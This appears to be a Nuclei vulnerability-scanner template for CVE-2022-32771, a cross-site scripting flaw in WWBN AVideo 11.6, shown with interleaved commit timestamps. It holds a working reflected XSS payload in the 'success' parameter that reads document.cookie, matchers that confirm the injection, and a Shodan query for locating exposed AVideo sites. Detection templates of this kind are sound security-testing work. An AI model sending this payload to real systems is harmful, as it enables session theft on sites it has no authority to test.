2022-08-28 07:50:20 +00:00
id : CVE-2022-32771
info :
2022-08-28 10:16:29 +00:00
name : WWBN AVideo 11.6 - Cross Site Scripting
2022-08-28 07:50:20 +00:00
author : arafatansari
severity : medium
description : |
2022-08-28 10:16:29 +00:00
A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "success" parameter which is inserted into the document with insufficient sanitization.
2022-08-28 07:50:20 +00:00
reference :
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
2022-08-28 10:16:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-32771
classification :
cve-id : CVE-2022-32771
2022-08-28 07:50:20 +00:00
metadata :
2022-08-28 10:16:29 +00:00
verified : true
2022-08-28 07:50:20 +00:00
shodan-query : http.html:"AVideo"
2022-08-28 10:16:29 +00:00
tags : cve,cve2022,avideo,xss
2022-08-28 07:50:20 +00:00
requests :
2022-08-28 10:16:29 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
2022-08-28 07:50:20 +00:00
matchers-condition : and
matchers :
2022-08-28 10:16:29 +00:00
- type : word
part : body
words :
- 'avideoAlertSuccess("</script><script>alert(document.cookie);</script>'
- 'text : "</script><script>alert(document.cookie);</script>'
condition : or
2022-08-28 07:50:20 +00:00
- type : word
2022-08-28 10:16:29 +00:00
part : header
2022-08-28 07:50:20 +00:00
words :
2022-08-28 10:16:29 +00:00
- text/html
- type : status
status :
- 200